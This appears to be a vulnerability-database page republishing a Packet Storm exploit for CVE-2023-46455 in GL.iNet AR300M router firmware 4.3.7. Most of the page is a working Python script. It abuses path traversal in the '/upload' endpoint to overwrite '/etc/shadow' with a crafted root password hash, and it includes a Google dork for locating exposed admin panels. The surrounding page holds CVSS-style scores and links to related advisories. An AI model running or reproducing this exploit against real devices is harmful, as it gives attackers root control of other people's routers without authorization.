Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMichele Di BonaventuraPACKETSTORM:177399
HistoryMar 04, 2024 - 12:00 a.m.

GL.iNet AR300M 4.3.7 Arbitrary File Write

2024-03-0400:00:00
Michele Di Bonaventura
packetstormsecurity.com
120
gl.inet
ar300m
arbitrary file write
cyberaz0r
unauthorized access
shadow file
exploit
cve-2023-46455
openwrt
firmware
authentication bypass

AI Score

7.4

Confidence

Low

EPSS

0.001

Percentile

18.0%

JSON
`#!/usr/bin/env python3  
  
# Exploit Title: GL.iNet <= 4.3.7 Arbitrary File Write  
# Google Dork: intitle:"GL.iNet Admin Panel"  
# Date: XX/11/2023  
# Exploit Author: Michele 'cyberaz0r' Di Bonaventura  
# Vendor Homepage: https://www.gli-net.com  
# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar  
# Version: 4.3.7  
# Tested on: GL.iNet AR300M  
# CVE: CVE-2023-46455  
  
import crypt  
import requests  
from sys import argv  
  
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)  
  
def craft_shadow_file(salted_password):  
shadow_content = 'root:{}:19459:0:99999:7:::\n'.format(salted_password)  
shadow_content += 'daemon:*:0:0:99999:7:::\n'  
shadow_content += 'ftp:*:0:0:99999:7:::\n'  
shadow_content += 'network:*:0:0:99999:7:::\n'  
shadow_content += 'nobody:*:0:0:99999:7:::\n'  
shadow_content += 'dnsmasq:x:0:0:99999:7:::\n'  
shadow_content += 'stubby:x:0:0:99999:7:::\n'  
shadow_content += 'ntp:x:0:0:99999:7::\n'  
shadow_content += 'mosquitto:x:0:0:99999:7::\n'  
shadow_content += 'logd:x:0:0:99999:7::\n'  
shadow_content += 'ubus:x:0:0:99999:7::\n'  
return shadow_content  
  
def replace_shadow_file(url, auth_token, shadow_content):  
data = {  
'sid': (None, auth_token),  
'size': (None, '4'),  
'path': (None, '/tmp/ovpn_upload/../../etc/shadow'),  
'file': ('shadow', shadow_content)  
}  
requests.post(url, files=data, verify=False)  
  
def main(base_url, auth_token):  
print('[+] Started GL.iNet <= 4.3.7 Arbitrary File Write exploit')  
  
password = input('[?] New password for root user: ')  
salted_password = crypt.crypt(password, salt=crypt.METHOD_MD5)  
  
shadow_content = craft_shadow_file(salted_password)  
print('[+] Crafted shadow file:\n{}'.format(shadow_content))  
  
print('[*] Replacing shadow file with the crafted one')  
replace_shadow_file(base_url+'/upload', auth_token, shadow_content)  
  
print('[+] Done')  
  
if __name__ == '__main__':  
if len(argv) < 3:  
print('Usage: {} <TARGET_URL> <AUTH_TOKEN>'.format(argv[0]))  
exit(1)  
  
main(argv[1], argv[2])  
  
  
`

Related

cve 1
cvelist 1
nvd 1
prion 1
vulnrichment 1
exploitdb 1
zdt 1
githubexploit 1
cve
cve
CVE-2023-46455
2023-12-12 15:15:07
cvelist
cvelist
CVE-2023-46455
2023-12-12 00:00:00
nvd
nvd
CVE-2023-46455
2023-12-12 15:15:07
prion
prion
Path traversal
2023-12-12 15:15:00
vulnrichment
vulnrichment
CVE-2023-46455
2023-12-12 00:00:00
exploitdb
exploitdb
GL.iNet AR300M v4.3.7 Arbitrary File Read - CVE-2023-46455 Exploit
2024-03-03 00:00:00
zdt
zdt
GL.iNet AR300M v4.3.7 Arbitrary File Read Exploit
2024-03-04 00:00:00
githubexploit
githubexploit
Exploit for OS Command Injection in Gl-Inet Gl-Ar300M Firmware
2023-12-08 01:45:16

AI Score

7.4

Confidence

Low

EPSS

0.001

Percentile

18.0%

JSON
Related for PACKETSTORM:177399
cve1cvelist1nvd1prion1vulnrichment1exploitdb1zdt1githubexploit1